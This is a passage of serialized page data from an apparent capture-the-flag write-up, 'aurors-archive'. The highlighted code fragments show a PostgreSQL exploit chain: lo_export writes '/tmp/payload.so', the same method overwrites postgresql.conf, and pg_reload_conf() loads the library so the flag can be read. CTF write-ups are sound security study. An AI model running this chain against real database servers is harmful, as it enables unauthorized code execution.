'base64'))\"",{"type":34,"tag":315,"props":6015,"children":6016},{"style":338},[6017],{"type":39,"value":3226},{"type":34,"tag":315,"props":6019,"children":6020},{"class":317,"line":4781},[6021,6025,6029,6033,6038,6042,6046,6050,6055],{"type":34,"tag":315,"props":6022,"children":6023},{"style":701},[6024],{"type":39,"value":5963},{"type":34,"tag":315,"props":6026,"children":6027},{"style":338},[6028],{"type":39,"value":351},{"type":34,"tag":315,"props":6030,"children":6031},{"style":384},[6032],{"type":39,"value":5972},{"type":34,"tag":315,"props":6034,"children":6035},{"style":360},[6036],{"type":39,"value":6037},"\"SELECT lo_export(",{"type":34,"tag":315,"props":6039,"children":6040},{"style":3541},[6041],{"type":39,"value":2066},{"type":34,"tag":315,"props":6043,"children":6044},{"style":701},[6045],{"type":39,"value":5986},{"type":34,"tag":315,"props":6047,"children":6048},{"style":3541},[6049],{"type":39,"value":525},{"type":34,"tag":315,"props":6051,"children":6052},{"style":360},[6053],{"type":39,"value":6054},", '/tmp/payload.so')\"",{"type":34,"tag":315,"props":6056,"children":6057},{"style":338},[6058],{"type":39,"value":3226},{"type":34,"tag":315,"props":6060,"children":6062},{"class":317,"line":6061},38,[6063],{"type":34,"tag":315,"props":6064,"children":6065},{"emptyLinePlaceholder":545},[6066],{"type":39,"value":548},{"type":34,"tag":315,"props":6068,"children":6070},{"class":317,"line":6069},39,[6071],{"type":34,"tag":315,"props":6072,"children":6073},{"style":322},[6074],{"type":39,"value":6075},"    # upload conf\n",{"type":34,"tag":315,"props":6077,"children":6079},{"class":317,"line":6078},40,[6080,6085,6089,6093,6097,6101,6105,6109],{"type":34,"tag":315,"props":6081,"children":6082},{"style":701},[6083],{"type":39,"value":6084},"    conf 
",{"type":34,"tag":315,"props":6086,"children":6087},{"style":338},[6088],{"type":39,"value":803},{"type":34,"tag":315,"props":6090,"children":6091},{"style":701},[6092],{"type":39,"value":5563},{"type":34,"tag":315,"props":6094,"children":6095},{"style":338},[6096],{"type":39,"value":351},{"type":34,"tag":315,"props":6098,"children":6099},{"style":354},[6100],{"type":39,"value":357},{"type":34,"tag":315,"props":6102,"children":6103},{"style":360},[6104],{"type":39,"value":3784},{"type":34,"tag":315,"props":6106,"children":6107},{"style":354},[6108],{"type":39,"value":357},{"type":34,"tag":315,"props":6110,"children":6111},{"style":338},[6112],{"type":39,"value":3226},{"type":34,"tag":315,"props":6114,"children":6116},{"class":317,"line":6115},41,[6117,6121,6125,6129],{"type":34,"tag":315,"props":6118,"children":6119},{"style":701},[6120],{"type":39,"value":5936},{"type":34,"tag":315,"props":6122,"children":6123},{"style":338},[6124],{"type":39,"value":803},{"type":34,"tag":315,"props":6126,"children":6127},{"style":701},[6128],{"type":39,"value":5271},{"type":34,"tag":315,"props":6130,"children":6131},{"style":338},[6132],{"type":39,"value":2686},{"type":34,"tag":315,"props":6134,"children":6136},{"class":317,"line":6135},42,[6137],{"type":34,"tag":315,"props":6138,"children":6139},{"style":701},[6140],{"type":39,"value":5544},{"type":34,"tag":315,"props":6142,"children":6144},{"class":317,"line":6143},43,[6145,6149,6153,6157,6161,6165,6169,6173,6177,6181,6185,6189,6193],{"type":34,"tag":315,"props":6146,"children":6147},{"style":701},[6148],{"type":39,"value":5963},{"type":34,"tag":315,"props":6150,"children":6151},{"style":338},[6152],{"type":39,"value":351},{"type":34,"tag":315,"props":6154,"children":6155},{"style":384},[6156],{"type":39,"value":5972},{"type":34,"tag":315,"props":6158,"children":6159},{"style":360},[6160],{"type":39,"value":5977},{"type":34,"tag":315,"props":6162,"children":6163},{"style":3541},[6164],{"type":39,"value":2066},{"type":34,"tag":3
15,"props":6166,"children":6167},{"style":701},[6168],{"type":39,"value":5986},{"type":34,"tag":315,"props":6170,"children":6171},{"style":3541},[6172],{"type":39,"value":525},{"type":34,"tag":315,"props":6174,"children":6175},{"style":360},[6176],{"type":39,"value":5995},{"type":34,"tag":315,"props":6178,"children":6179},{"style":3541},[6180],{"type":39,"value":2066},{"type":34,"tag":315,"props":6182,"children":6183},{"style":701},[6184],{"type":39,"value":3784},{"type":34,"tag":315,"props":6186,"children":6187},{"style":3541},[6188],{"type":39,"value":525},{"type":34,"tag":315,"props":6190,"children":6191},{"style":360},[6192],{"type":39,"value":6013},{"type":34,"tag":315,"props":6194,"children":6195},{"style":338},[6196],{"type":39,"value":3226},{"type":34,"tag":315,"props":6198,"children":6200},{"class":317,"line":6199},44,[6201,6205,6209,6213,6217,6221,6225,6229,6234],{"type":34,"tag":315,"props":6202,"children":6203},{"style":701},[6204],{"type":39,"value":5963},{"type":34,"tag":315,"props":6206,"children":6207},{"style":338},[6208],{"type":39,"value":351},{"type":34,"tag":315,"props":6210,"children":6211},{"style":384},[6212],{"type":39,"value":5972},{"type":34,"tag":315,"props":6214,"children":6215},{"style":360},[6216],{"type":39,"value":6037},{"type":34,"tag":315,"props":6218,"children":6219},{"style":3541},[6220],{"type":39,"value":2066},{"type":34,"tag":315,"props":6222,"children":6223},{"style":701},[6224],{"type":39,"value":5986},{"type":34,"tag":315,"props":6226,"children":6227},{"style":3541},[6228],{"type":39,"value":525},{"type":34,"tag":315,"props":6230,"children":6231},{"style":360},[6232],{"type":39,"value":6233},", 
'/var/lib/postgresql/data/postgresql.conf')\"",{"type":34,"tag":315,"props":6235,"children":6236},{"style":338},[6237],{"type":39,"value":3226},{"type":34,"tag":315,"props":6239,"children":6241},{"class":317,"line":6240},45,[6242],{"type":34,"tag":315,"props":6243,"children":6244},{"emptyLinePlaceholder":545},[6245],{"type":39,"value":548},{"type":34,"tag":315,"props":6247,"children":6249},{"class":317,"line":6248},46,[6250],{"type":34,"tag":315,"props":6251,"children":6252},{"style":322},[6253],{"type":39,"value":6254},"    # reload conf\n",{"type":34,"tag":315,"props":6256,"children":6258},{"class":317,"line":6257},47,[6259,6263,6267,6271,6276],{"type":34,"tag":315,"props":6260,"children":6261},{"style":701},[6262],{"type":39,"value":5963},{"type":34,"tag":315,"props":6264,"children":6265},{"style":338},[6266],{"type":39,"value":351},{"type":34,"tag":315,"props":6268,"children":6269},{"style":384},[6270],{"type":39,"value":5972},{"type":34,"tag":315,"props":6272,"children":6273},{"style":360},[6274],{"type":39,"value":6275},"\"SELECT 
pg_reload_conf()\"",{"type":34,"tag":315,"props":6277,"children":6278},{"style":338},[6279],{"type":39,"value":3226},{"type":34,"tag":315,"props":6281,"children":6283},{"class":317,"line":6282},48,[6284,6288,6292,6296,6300],{"type":34,"tag":315,"props":6285,"children":6286},{"style":701},[6287],{"type":39,"value":5963},{"type":34,"tag":315,"props":6289,"children":6290},{"style":338},[6291],{"type":39,"value":351},{"type":34,"tag":315,"props":6293,"children":6294},{"style":384},[6295],{"type":39,"value":5972},{"type":34,"tag":315,"props":6297,"children":6298},{"style":360},[6299],{"type":39,"value":6275},{"type":34,"tag":315,"props":6301,"children":6302},{"style":338},[6303],{"type":39,"value":3226},{"type":34,"tag":315,"props":6305,"children":6307},{"class":317,"line":6306},49,[6308,6312,6316,6320,6324],{"type":34,"tag":315,"props":6309,"children":6310},{"style":701},[6311],{"type":39,"value":5963},{"type":34,"tag":315,"props":6313,"children":6314},{"style":338},[6315],{"type":39,"value":351},{"type":34,"tag":315,"props":6317,"children":6318},{"style":384},[6319],{"type":39,"value":5972},{"type":34,"tag":315,"props":6321,"children":6322},{"style":360},[6323],{"type":39,"value":6275},{"type":34,"tag":315,"props":6325,"children":6326},{"style":338},[6327],{"type":39,"value":3226},{"type":34,"tag":48,"props":6329,"children":6330},{},[6331,6333,6338],{"type":39,"value":6332},"Once the configuration is reloaded, we can retrieve the flag using the ",{"type":34,"tag":59,"props":6334,"children":6336},{"className":6335},[],[6337],{"type":39,"value":64},{"type":39,"value":6339}," binary",{"type":34,"tag":73,"props":6341,"children":6343},{"imgSrc":6342,":width":3448},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743113795/writeups/aurors-archive/read_flag.webp",[],{"type":34,"tag":6345,"props":6346,"children":6347},"style",{},[6348],{"type":39,"value":6349},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: 
var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":328,"depth":318,"links":6351},[6352,6353,6354,6355],{"id":43,"depth":328,"text":46},{"id":268,"depth":328,"text":271},{"id":721,"depth":328,"text":724},{"id":3452,"depth":328,"text":3455},"markdown","content:writeups:aurors-archive.md","content","writeups/aurors-archive.md","writeups/aurors-archive","md",1749027224490]